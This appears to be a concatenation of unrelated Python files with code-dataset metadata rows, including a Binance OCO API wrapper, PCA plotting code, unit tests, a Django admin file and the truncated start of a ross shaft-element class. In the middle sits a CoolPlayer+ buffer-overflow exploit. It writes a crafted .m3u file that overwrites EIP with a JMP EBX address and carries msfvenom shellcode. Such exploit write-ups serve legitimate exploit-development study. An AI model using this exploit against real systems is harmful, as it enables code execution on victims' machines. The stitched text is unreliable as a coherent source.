startTime: Optional[Union[str, date, datetime]] = None,
endTime: Optional[Union[str, date, datetime]] = None,
limit: Optional[int] = None,
recvWindow: int = 5000
) -> dict:
"""
Retrieve all OCO based on provided optional parameters.
Weight: 10
Data Source: Database
Other info
----------
If `fromID` supplied, neither `startTime` or `endTime` can be
provided.
Parameters
----------
fromId (Optional[str]):
The Id of the OCO to start from. Eg. fromId should be from
and order older than now.
startTime (Optional[Union[str, date, datetime]]):
TODO: confirm if time is expressed in ms
Optional: The point in history to get data from.
endTime (Optional[Union[str, date, datetime]]):
TODO: confirm if time is expressed in ms
Optional: The point in history to get data to.
limit (Optional[int]):
Optional: The number of trades to get starting from
now - `limit`
Example: if `limit` is set to 10 the API will return
the 10 previous trades.
recvWindow (int):
Number of milliseconds in which to complete the transaction.
If timeout, transaction is being cancelled.
Defaults to 5000.
Returns
-------
(List[dict])
A list of all oco orders for the given parameters.
[
{
'orderListId': 4921,
'contingencyType': 'OCO',
'listStatusType': 'ALL_DONE',
'listOrderStatus': 'ALL_DONE',
'listClientOrderId': 'vngnEJ8Zdy8XF0lhwTgux3',
'transactionTime': 1622389489116,
'symbol': 'BTCUSDT',
'orders':
[
{
'symbol': 'BTCUSDT',
'orderId': 5729322,
'clientOrderId': 'J1Pe3pq2LAPCgPiffgDbSl'
},
{
'symbol': 'BTCUSDT',
'orderId': 5729323,
'clientOrderId': 'JCgR0zZitgIf5PYXucdS3h'
}
]
},
{
'orderListId': 4922,
'contingencyType': 'OCO',
'listStatusType': 'ALL_DONE',
'listOrderStatus': 'ALL_DONE',
'listClientOrderId': 'PLNwO0VkIhqTaOyTbjzMJt',
'transactionTime': 1622390178451,
'symbol': 'BTCUSDT',
'orders':
[
{
'symbol': 'BTCUSDT',
'orderId': 5730856,
'clientOrderId': 'aRVtxZ0ytCpU5vbRSagtS1'
},
{
'symbol': 'BTCUSDT',
'orderId': 5730857,
'clientOrderId': 'cNhPm3TRaLEmqTrAHXq1wL'
}
]
},
{'orderListId': 4923,
'contingencyType': 'OCO',
'listStatusType': 'ALL_DONE',
'listOrderStatus': 'ALL_DONE',
'listClientOrderId': '7S91ZYqjQzKnylUO8IABGb',
'transactionTime': 1622393416854,
'symbol': 'BTCUSDT',
'orders':
[
{
'symbol': 'BTCUSDT',
'orderId': 5739602,
'clientOrderId': 'gFoIpd2GxKb1RJMvN7dSUc'
},
{
'symbol': 'BTCUSDT',
'orderId': 5739603,
'clientOrderId': '8QzeCXJ1qFQdiDPiSczVRg'
}
]
}
]
"""
return get(
self._url,
'allOrderList',
key=self.__key,
secret=self.__secret,
fromId=fromId,
startTime=startTime,
endTime=endTime,
limit=limit,
recvWindow=recvWindow
)
def orderList(
self,
orderListId: Optional[int] = None,
origClientOrderId: Optional[str] = None,
recvWindow: int = 5000
) -> dict:
"""
Retrieve a specific OCO based on provided optional parameters.
Weight: 2
Data Source: Database
Other info
----------
Either `orderListId` or `listClientOrderId` must be provided.
Parameters
----------
orderListId (Optional[int]):
The Id of the OCO order.
origClientOrderId (Optional[str]):
The corresponding order id generated at time of order.
recvWindow (int):
Number of milliseconds in which to complete the transaction.
If timeout, transaction is being cancelled.
Defaults to 5000.
Returns
-------
(dict)
A list of the oco orders for the given ID.
{
'orderListId': 4922,
'contingencyType': 'OCO',
'listStatusType': 'ALL_DONE',
'listOrderStatus': 'ALL_DONE',
'listClientOrderId': 'PLNwO0VkIhqTaOyTbjzMJt',
'transactionTime': 1622390178451,
'symbol': 'BTCUSDT',
'orders': [
{
'symbol': 'BTCUSDT',
'orderId': 5730856,
'clientOrderId': 'aRVtxZ0ytCpU5vbRSagtS1'
},
{
'symbol': 'BTCUSDT',
'orderId': 5730857,
'clientOrderId': 'cNhPm3TRaLEmqTrAHXq1wL'
}
]
}
"""
return get(
self._url,
'orderList',
key=self.__key,
secret=self.__secret,
orderListId=orderListId,
origClientOrderId=origClientOrderId,
recvWindow=recvWindow
)
def openOrderList(
self,
recvWindow: int = 5000
) -> dict:
"""
Retrieve all open OCO orders.
Weight: 3
Data Source: Database
Other info
----------
Parameters
----------
recvWindow (int):
Number of milliseconds in which to complete the transaction.
If timeout, transaction is being cancelled.
Defaults to 5000.
Returns
-------
(List[dict])
A list of open oco orders.
{
'orderListId': 4922,
'contingencyType': 'OCO',
'listStatusType': 'EXEC_STARTED',
'listOrderStatus': 'EXECUTING',
'listClientOrderId': 'PLNwO0VkIhqTaOyTbjzMJt',
'transactionTime': 1622390178451,
'symbol': 'BTCUSDT',
'orders': [
{
'symbol': 'BTCUSDT',
'orderId': 5730856,
'clientOrderId': 'aRVtxZ0ytCpU5vbRSagtS1'
},
{
'symbol': 'BTCUSDT',
'orderId': 5730857,
'clientOrderId': 'cNhPm3TRaLEmqTrAHXq1wL'
}
]
}
"""
return get(
self._url,
'openOrderList',
key=self.__key,
secret=self.__secret,
recvWindow=recvWindow
)
del(Literal, Optional, date, datetime)
| 35.00365
| 98
| 0.483224
| 3,999
| 47,955
| 5.750688
| 0.117279
| 0.018089
| 0.016524
| 0.012784
| 0.792669
| 0.756577
| 0.740749
| 0.716789
| 0.694569
| 0.658651
| 0
| 0.047769
| 0.430758
| 47,955
| 1,369
| 99
| 35.029218
| 0.794674
| 0.659222
| 0
| 0.698113
| 0
| 0
| 0.016968
| 0
| 0
| 0
| 0
| 0.020453
| 0
| 1
| 0.056604
| false
| 0
| 0.015094
| 0
| 0.128302
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
bc61540acf3ad8176467553f7582a9bedd85a42b
| 3,426
|
py
|
Python
|
coolplayer_plus/coolplayer_plus_bof.py
|
m1kemu/ExploitDev
|
4a51a6bc83577c619a626fe037a885e007ef3f31
|
[
"MIT"
] | null | null | null |
coolplayer_plus/coolplayer_plus_bof.py
|
m1kemu/ExploitDev
|
4a51a6bc83577c619a626fe037a885e007ef3f31
|
[
"MIT"
] | null | null | null |
coolplayer_plus/coolplayer_plus_bof.py
|
m1kemu/ExploitDev
|
4a51a6bc83577c619a626fe037a885e007ef3f31
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# Author: Michael Music
# Date: 6/11/2019
# Description: Coolplayer+ Buffer Overflow Exploit
# Exercise in BOFs following the securitysift guide
# Tested on Windows XP
# Notes: An abnormal shellcode location within ESP allows for creating ways of
# launching shellcode.
# App must be installed, launched at C:/
# m3u file must be located at C:/
# EIP at offset 260
# ESP at offset 264
# EDX at offset 0
# EBX at offset 0
# There is only around 250 bytes worth of spaces at ESP, so it's limited
# Can't fit shellcode in beginning of buffer (where EBX/EDX point), as EIP is at 260
# EBX points to much more space, around 10000 bytes
# Solution is to JMP EBX, launch custom JMP code to jump over EIP,ESP and into shellcode
# Exploit: [Custom JMP code - jump to nops][Junk][EIP - JMP EBX][nops][shellcode][Junk]
# Found a JMP EBX at 0x7c873c53 in kernel32.dll
custom_jmp = '\xCC' * 16
junk = 'A' * (260-16)
eip = '\x53\x3c\x87\x7c'
nops = '\x90' * 100
shellcode = '\xCC' * 500
exploit_string = custom_jmp + junk + eip + nops + shellcode
exploit_string += 'A' * (10000 - len(exploit_string))
out = 'crash.m3u'
# msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f python -e x86/alpha_mixed
buf = ""
buf += "\x89\xe2\xd9\xc9\xd9\x72\xf4\x5e\x56\x59\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x39\x6c\x5a\x48\x6c"
buf += "\x42\x53\x30\x55\x50\x33\x30\x51\x70\x6e\x69\x4d\x35"
buf += "\x45\x61\x6b\x70\x55\x34\x6e\x6b\x66\x30\x34\x70\x6c"
buf += "\x4b\x42\x72\x54\x4c\x4e\x6b\x32\x72\x34\x54\x6c\x4b"
buf += "\x62\x52\x46\x48\x36\x6f\x4d\x67\x61\x5a\x34\x66\x64"
buf += "\x71\x59\x6f\x6c\x6c\x55\x6c\x53\x51\x31\x6c\x63\x32"
buf += "\x56\x4c\x51\x30\x69\x51\x78\x4f\x34\x4d\x77\x71\x68"
buf += "\x47\x79\x72\x4b\x42\x36\x32\x51\x47\x6e\x6b\x63\x62"
buf += "\x32\x30\x6e\x6b\x53\x7a\x65\x6c\x4e\x6b\x42\x6c\x62"
buf += "\x31\x30\x78\x4a\x43\x47\x38\x53\x31\x6e\x31\x66\x31"
buf += "\x6c\x4b\x46\x39\x71\x30\x55\x51\x6a\x73\x6e\x6b\x63"
buf += "\x79\x66\x78\x79\x73\x67\x4a\x31\x59\x6e\x6b\x55\x64"
buf += "\x6c\x4b\x66\x61\x79\x46\x55\x61\x39\x6f\x6c\x6c\x69"
buf += "\x51\x38\x4f\x34\x4d\x46\x61\x58\x47\x50\x38\x4d\x30"
buf += "\x52\x55\x68\x76\x66\x63\x61\x6d\x38\x78\x55\x6b\x53"
buf += "\x4d\x65\x74\x54\x35\x6b\x54\x42\x78\x6e\x6b\x72\x78"
buf += "\x34\x64\x35\x51\x59\x43\x73\x56\x4e\x6b\x76\x6c\x70"
buf += "\x4b\x6e\x6b\x72\x78\x47\x6c\x66\x61\x6e\x33\x4e\x6b"
buf += "\x74\x44\x4e\x6b\x53\x31\x48\x50\x6b\x39\x77\x34\x71"
buf += "\x34\x55\x74\x51\x4b\x61\x4b\x63\x51\x56\x39\x43\x6a"
buf += "\x50\x51\x59\x6f\x4b\x50\x61\x4f\x43\x6f\x51\x4a\x4c"
buf += "\x4b\x56\x72\x7a\x4b\x6e\x6d\x71\x4d\x33\x5a\x76\x61"
buf += "\x6c\x4d\x6b\x35\x6e\x52\x67\x70\x53\x30\x45\x50\x42"
buf += "\x70\x53\x58\x65\x61\x6c\x4b\x62\x4f\x4b\x37\x4b\x4f"
buf += "\x6a\x75\x4f\x4b\x6c\x30\x78\x35\x49\x32\x42\x76\x71"
buf += "\x78\x59\x36\x4f\x65\x4f\x4d\x6f\x6d\x39\x6f\x49\x45"
buf += "\x45\x6c\x64\x46\x63\x4c\x76\x6a\x6f\x70\x49\x6b\x49"
buf += "\x70\x51\x65\x67\x75\x4d\x6b\x77\x37\x35\x43\x31\x62"
buf += "\x50\x6f\x50\x6a\x75\x50\x42\x73\x49\x6f\x49\x45\x61"
buf += "\x73\x75\x31\x52\x4c\x51\x73\x66\x4e\x33\x55\x44\x38"
buf += "\x62\x45\x67\x70\x41\x41"
text = open(out, 'w')
text.write(exploit_string)
text.close
| 45.078947
| 88
| 0.689434
| 697
| 3,426
| 3.378766
| 0.27977
| 0.020382
| 0.02293
| 0.020382
| 0.016561
| 0.008917
| 0
| 0
| 0
| 0
| 0
| 0.269605
| 0.099241
| 3,426
| 75
| 89
| 45.68
| 0.493519
| 0.267367
| 0
| 0
| 0
| 0.723404
| 0.736039
| 0.719968
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
bc9dd9b8f6b9405ccfc1a0db9c2cce2bad705b34
| 21
|
py
|
Python
|
scripts/dummy.py
|
brettharder/nba_predictions
|
e3a0c2068599caa315387f6e91a9d958d8ed0b72
|
[
"MIT"
] | null | null | null |
scripts/dummy.py
|
brettharder/nba_predictions
|
e3a0c2068599caa315387f6e91a9d958d8ed0b72
|
[
"MIT"
] | null | null | null |
scripts/dummy.py
|
brettharder/nba_predictions
|
e3a0c2068599caa315387f6e91a9d958d8ed0b72
|
[
"MIT"
] | null | null | null |
####
### TESTING
###
| 5.25
| 11
| 0.333333
| 1
| 21
| 7
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.190476
| 21
| 3
| 12
| 7
| 0.411765
| 0.333333
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
bca2f169f9c644a01661e1cb5506a6ba324bfaf9
| 95
|
py
|
Python
|
ControlManual/src/utils/error.py
|
ZeroIntensity/ControlManual
|
9bd3e5eda22df70baa8a9bf324fd4efaacb924b2
|
[
"MIT"
] | 1
|
2021-12-20T18:07:50.000Z
|
2021-12-20T18:07:50.000Z
|
ControlManual/src/utils/error.py
|
ZeroIntensity/ControlManual
|
9bd3e5eda22df70baa8a9bf324fd4efaacb924b2
|
[
"MIT"
] | 16
|
2021-12-20T19:07:07.000Z
|
2021-12-27T21:03:48.000Z
|
ControlManual/src/utils/error.py
|
ZeroIntensity/ControlManual
|
9bd3e5eda22df70baa8a9bf324fd4efaacb924b2
|
[
"MIT"
] | 1
|
2021-12-19T19:41:11.000Z
|
2021-12-19T19:41:11.000Z
|
from ..console import console
def error(message: str) -> None:
console.error(message)
| 19
| 33
| 0.684211
| 12
| 95
| 5.416667
| 0.666667
| 0.369231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 95
| 4
| 34
| 23.75
| 0.855263
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
bca5f432dc757e49f7c6ba06c9da9e25224e81a8
| 1,772
|
py
|
Python
|
mriqc/reports/tests/test_reports.py
|
cbinyu/mriqc
|
471d7bb8a6f1611bec813fd62175ea74494552af
|
[
"BSD-3-Clause"
] | null | null | null |
mriqc/reports/tests/test_reports.py
|
cbinyu/mriqc
|
471d7bb8a6f1611bec813fd62175ea74494552af
|
[
"BSD-3-Clause"
] | null | null | null |
mriqc/reports/tests/test_reports.py
|
cbinyu/mriqc
|
471d7bb8a6f1611bec813fd62175ea74494552af
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
#
# @Author: oesteban
# @Date: 2016-01-05 11:33:39
# @Email: code@oscaresteban.es
"""Test utils"""
from __future__ import print_function, division, absolute_import, unicode_literals
# import os.path as op
# import pytest
# from io import open # pylint: disable=W0622
# from mriqc.reports.utils import check_reports
# @pytest.fixture(scope='session')
# @pytest.mark.parametrize("dataset,reports,expected", [
# ({'t1w': ['/data/bidsroot/sub-06/anat/sub-06_T1w.nii.gz',
# '/data/bidsroot/sub-11/anat/sub-11_T1w.nii.gz',
# '/data/bidsroot/sub-05/anat/sub-05_T1w.nii.gz',
# '/data/bidsroot/sub-13/anat/sub-13_T1w.nii.gz'],
# 'func': ['/data/bidsroot/sub-09/func/sub-09_task-rhymejudgment_bold.nii.gz',
# '/data/bidsroot/sub-03/func/sub-03_task-rhymejudgment_bold.nii.gz',
# '/data/bidsroot/sub-06/func/sub-06_task-rhymejudgment_bold.nii.gz']},
# ['anatomical_sub-05_ses-default-session_run-default-run_report.html',
# 'anatomical_sub-06_ses-default-session_run-default-run_report.html',
# 'anatomical_sub-13_ses-default-session_run-default-run_report.html',
# 'functional_sub-06_ses-default_session_task-rhymejudgment_run-default_run_report.html'])
# ])
# def test_check_reports(tmpdir_factory, dataset, reports):
# out_folder = tmpdir_factory.mktemp('reports')
# for rname in reports:
# open(op.join(out_folder, rname), 'a').close()
# settings = {'reports_dir': out_folder,
# 'bids_dir': '/data/bidsroot'}
# check_reports(dataset, settings)
# assert True
| 44.3
| 96
| 0.671558
| 250
| 1,772
| 4.572
| 0.42
| 0.08399
| 0.091864
| 0.074366
| 0.32371
| 0.259843
| 0.199475
| 0.199475
| 0.092738
| 0.092738
| 0
| 0.043185
| 0.163657
| 1,772
| 39
| 97
| 45.435897
| 0.72807
| 0.909142
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 5
|
bcff05c10b2aa1d09ec4271fdda76ad3e38e2681
| 3,844
|
py
|
Python
|
uk_biobank/DeGAs/src/py/rivas_decomposition_py/plot_pca.py
|
bschilder/public-resources
|
54c129cc27f17d36ff512987659a20eebaa4f0da
|
[
"MIT"
] | null | null | null |
uk_biobank/DeGAs/src/py/rivas_decomposition_py/plot_pca.py
|
bschilder/public-resources
|
54c129cc27f17d36ff512987659a20eebaa4f0da
|
[
"MIT"
] | null | null | null |
uk_biobank/DeGAs/src/py/rivas_decomposition_py/plot_pca.py
|
bschilder/public-resources
|
54c129cc27f17d36ff512987659a20eebaa4f0da
|
[
"MIT"
] | null | null | null |
import os, logging, collections
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
from logging.config import dictConfig
from logging import getLogger
dictConfig(dict(
version = 1,
formatters = {'f': {'format': '%(asctime)s %(name)-12s %(levelname)-8s %(message)s'}},
handlers = {
'h': {'class': 'logging.StreamHandler','formatter': 'f',
'level': logging.DEBUG}},
root = {'handlers': ['h'], 'level': logging.DEBUG,},
))
logger = getLogger('plot_pca')
def plot_pca_phe(
d, pc_index1, pc_index2,
figsize=(12,12),
flip_xaxis=False, flip_yaxis=False,
save=None, save_exts=['pdf', 'png'],
):
"""scatter plot of variants with phenotype annotation (arrows)"""
# prepare data
plot_d_phe = d.plot_data_pca_phe(pc_index1, pc_index2)
plot_ds=[plot_d_phe]
# prepare fig grid
fig = plt.figure(figsize=figsize)
gs = gridspec.GridSpec(1, 1)
fig_axs = [fig.add_subplot(sp) for sp in gs]
for ax, plot_d in zip(fig_axs, plot_ds):
ax.set_aspect('equal')
ax.scatter(
plot_d['x'], plot_d['y'],
marker='x', s=(15**2),
color='blue'
)
ax_max = 1.1 * np.max([plot_d['x'], -plot_d['x'], plot_d['y'], -plot_d['y']])
if(flip_xaxis):
ax.set_xlim([ax_max, -ax_max])
else:
ax.set_xlim([-ax_max, ax_max])
if(flip_yaxis):
ax.set_ylim([ax_max, -ax_max])
else:
ax.set_ylim([-ax_max, ax_max])
gs.tight_layout(fig, rect=[0, 0, 1, 1])
# save to file
if save is not None:
for ext in save_exts:
tmp_save_file='{}.{}'.format(save, ext)
if(not os.path.exists(os.path.dirname(tmp_save_file))):
os.makedirs(os.path.dirname(tmp_save_file))
logger.info('saving the image to {}'.format(tmp_save_file))
fig.savefig(tmp_save_file, bbox_inches="tight", pad_inches=0.0)
def plot_pca(
d, pc_index1, pc_index2,
figsize=(12,6),
flip_xaxis=False, flip_yaxis=False,
save=None, save_exts=['pdf', 'png'],
):
"""scatter plot of variants with phenotype annotation (arrows)"""
# prepare data
plot_d_phe = d.plot_data_pca_phe(pc_index1, pc_index2)
plot_d_var = d.plot_data_pca_var(pc_index1, pc_index2)
plot_ds = [plot_d_phe, plot_d_var]
# prepare fig grid
fig = plt.figure(figsize=figsize)
gs = gridspec.GridSpec(1, 2)
fig_axs = [fig.add_subplot(sp) for sp in gs]
for ax, plot_d in zip(fig_axs, plot_ds):
ax.set_aspect('equal')
ax.scatter(
plot_d['x'], plot_d['y'],
marker='x', s=(15**2),
color='blue',
)
ax.set_title(plot_d['title'])
ax.set_xlabel(plot_d['xlabel'])
ax.set_ylabel(plot_d['ylabel'])
ax_max = 1.1 * np.max([plot_d['x'], -plot_d['x'], plot_d['y'], -plot_d['y']])
if(flip_xaxis):
ax.set_xlim([ax_max, -ax_max])
else:
ax.set_xlim([-ax_max, ax_max])
if(flip_yaxis):
ax.set_ylim([ax_max, -ax_max])
else:
ax.set_ylim([-ax_max, ax_max])
gs.tight_layout(fig, rect=[0, 0, 1, 1])
# save to file
if save is not None:
for ext in save_exts:
tmp_save_file='{}.{}'.format(save, ext)
if(not os.path.exists(os.path.dirname(tmp_save_file))):
os.makedirs(os.path.dirname(tmp_save_file))
logger.info('saving the image to {}'.format(tmp_save_file))
fig.savefig(tmp_save_file, bbox_inches="tight", pad_inches=0.0)
| 32.033333
| 90
| 0.559573
| 548
| 3,844
| 3.686131
| 0.218978
| 0.056931
| 0.054455
| 0.039604
| 0.762376
| 0.762376
| 0.762376
| 0.736634
| 0.736634
| 0.716832
| 0
| 0.017318
| 0.293965
| 3,844
| 120
| 91
| 32.033333
| 0.726971
| 0.05359
| 0
| 0.644444
| 0
| 0
| 0.068176
| 0.005796
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022222
| false
| 0
| 0.077778
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
4c22cfb1dfdbdfacb56df6760b38329c83b344d5
| 1,757
|
py
|
Python
|
teszt/test_feladat03.py
|
python-feladatok-tesztekkel/06-01-01-stringek-for-betu
|
e73a028d757d330837602d58e6e03d343d92b309
|
[
"CC0-1.0"
] | null | null | null |
teszt/test_feladat03.py
|
python-feladatok-tesztekkel/06-01-01-stringek-for-betu
|
e73a028d757d330837602d58e6e03d343d92b309
|
[
"CC0-1.0"
] | null | null | null |
teszt/test_feladat03.py
|
python-feladatok-tesztekkel/06-01-01-stringek-for-betu
|
e73a028d757d330837602d58e6e03d343d92b309
|
[
"CC0-1.0"
] | null | null | null |
from unittest import TestCase
import os,sys,inspect
current_dir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parent_dir = os.path.dirname(current_dir)
sys.path.insert(0, parent_dir)
import feladatok
class Megszamol(TestCase):
def test_feladat01(self):
keresett='e'
mondat="Nincs"
aktualis = feladatok.megszamol(keresett,mondat)
elvart = 0
self.assertEqual(elvart, aktualis, "Rosszul határozta meg, hogy a(z) "+str(keresett)+" betű hányszor szerepel a mondatban: "+mondat)
def test_feladat02(self):
keresett='E'
mondat="Nincs"
aktualis = feladatok.megszamol(keresett,mondat)
elvart = 0
self.assertEqual(elvart, aktualis, "Rosszul határozta meg, hogy a(z) "+str(keresett)+" betű hányszor szerepel a mondatban: "+mondat)
def test_feladat03(self):
keresett='E'
mondat="Nincs a betű"
aktualis = feladatok.megszamol(keresett,mondat)
elvart = 1
self.assertEqual(elvart, aktualis, "Rosszul határozta meg, hogy a(z) "+str(keresett)+" betű hányszor szerepel a mondatban: "+mondat)
def test_feladat04(self):
keresett='e'
mondat="Nincs a betű"
aktualis = feladatok.megszamol(keresett,mondat)
elvart = 1
self.assertEqual(elvart, aktualis, "Rosszul határozta meg, hogy a(z) "+str(keresett)+" betű hányszor szerepel a mondatban: "+mondat)
def test_feladat05(self):
keresett='e'
mondat="eaea eaea EAEA EAEA eaeaa mondatban: "
aktualis = feladatok.megszamol(keresett,mondat)
elvart = 10
self.assertEqual(elvart, aktualis, "Rosszul határozta meg, hogy a(z) "+str(keresett)+" betű hányszor szerepel a mondatban: "+mondat)
| 42.853659
| 140
| 0.677291
| 212
| 1,757
| 5.570755
| 0.235849
| 0.029636
| 0.055038
| 0.08044
| 0.739204
| 0.739204
| 0.700254
| 0.700254
| 0.700254
| 0.700254
| 0
| 0.012266
| 0.211155
| 1,757
| 40
| 141
| 43.925
| 0.839827
| 0
| 0
| 0.621622
| 0
| 0
| 0.242597
| 0
| 0
| 0
| 0
| 0
| 0.135135
| 1
| 0.135135
| false
| 0
| 0.081081
| 0
| 0.243243
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
4c2f4bdea96dc4b5c39bc8970a427679b9030377
| 143
|
py
|
Python
|
backend-project/small_eod/features/admin.py
|
kostyrko/small_eod
|
c12fe36f2233bdd297d32d61d9cd25ddbfca897b
|
[
"MIT"
] | 1
|
2021-02-10T19:58:51.000Z
|
2021-02-10T19:58:51.000Z
|
backend-project/small_eod/features/admin.py
|
kostyrko/small_eod
|
c12fe36f2233bdd297d32d61d9cd25ddbfca897b
|
[
"MIT"
] | null | null | null |
backend-project/small_eod/features/admin.py
|
kostyrko/small_eod
|
c12fe36f2233bdd297d32d61d9cd25ddbfca897b
|
[
"MIT"
] | 1
|
2021-02-10T19:38:35.000Z
|
2021-02-10T19:38:35.000Z
|
from django.contrib import admin
from .models import Feature, FeatureOption
admin.site.register(Feature)
admin.site.register(FeatureOption)
| 17.875
| 42
| 0.825175
| 18
| 143
| 6.555556
| 0.555556
| 0.152542
| 0.288136
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.097902
| 143
| 7
| 43
| 20.428571
| 0.914729
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
4c4a5c3022a88438c8dfcd95acaa5de353cd0c70
| 76,616
|
py
|
Python
|
ross/shaft_element.py
|
startup0820/ross
|
44a3b2504e15c9ba9952a62ad6be828ef594f55a
|
[
"MIT"
] | 1
|
2021-07-20T04:24:19.000Z
|
2021-07-20T04:24:19.000Z
|
ross/shaft_element.py
|
startup0820/ross
|
44a3b2504e15c9ba9952a62ad6be828ef594f55a
|
[
"MIT"
] | null | null | null |
ross/shaft_element.py
|
startup0820/ross
|
44a3b2504e15c9ba9952a62ad6be828ef594f55a
|
[
"MIT"
] | null | null | null |
"""Shaft Element module.
This module defines the ShaftElement classes which will be used to represent the rotor
shaft. There're 2 options, an element with 8 or 12 degrees of freedom.
"""
import inspect
import os
from pathlib import Path
import numpy as np
import toml
from plotly import graph_objects as go
from ross.element import Element
from ross.materials import Material, steel
from ross.units import Q_, check_units
from ross.utils import read_table_file
__all__ = ["ShaftElement", "ShaftElement6DoF"]
class ShaftElement(Element):
r"""A shaft element.
This class will create a shaft element that may take into
account shear, rotary inertia an gyroscopic effects.
The matrices will be defined considering the following local
coordinate vector:
.. math::
[x_0, y_0, \alpha_0, \beta_0, x_1, y_1, \alpha_1, \beta_1]^T
Where :math:`\alpha_0` and :math:`\alpha_1` are the bending on the yz plane
and :math:`\beta_0` and :math:`\beta_1` are the bending on the xz plane.
Parameters
----------
L : float, pint.Quantity
Element length (m).
idl : float, pint.Quantity
Inner diameter of the element at the left position (m).
odl : float, pint.Quantity
Outer diameter of the element at the left position (m).
idr : float, pint.Quantity, optional
Inner diameter of the element at the right position (m).
Default is equal to idl value (cylindrical element).
odr : float, pint.Quantity, optional
Outer diameter of the element at the right position (m).
Default is equal to odl value (cylindrical element).
material : ross.Material
Shaft material.
n : int, optional
Element number (coincident with it's first node).
If not given, it will be set when the rotor is assembled
according to the element's position in the list supplied to
the rotor constructor.
axial_force : float, optional
Axial force (N).
torque : float, optional
Torque (N*m).
shear_effects : bool, optional
Determine if shear effects are taken into account.
Default is True.
rotary_inertia : bool, optional
Determine if rotary_inertia effects are taken into account.
Default is True.
gyroscopic : bool, optional
Determine if gyroscopic effects are taken into account.
Default is True.
shear_method_calc : str, optional
Determines which shear calculation method the user will adopt
Default is 'cowper'
tag : str, optional
Element tag.
Default is None.
Returns
-------
shaft_element : ross.ShaftElement
A shaft_element object.
Attributes
----------
Poisson : float
Poisson coefficient for the element.
A : float
Element section area at half length (m**2).
A_l : float
Element section area at left end (m**2).
A_r : float
Element section area at right end (m**2).
beam_cg : float
Element center of gravity local position (m).
axial_cg_pos : float
Element center of gravity global position (m).
This should be used only after the rotor is built.
Default is None.
Ie : float
Ie is the second moment of area of the cross section about
the neutral plane (m**4).
phi : float
Constant that is used according to :cite:`friswell2010dynamics` to
consider rotary inertia and shear effects. If these are not considered
:math:`\phi=0`.
kappa : float
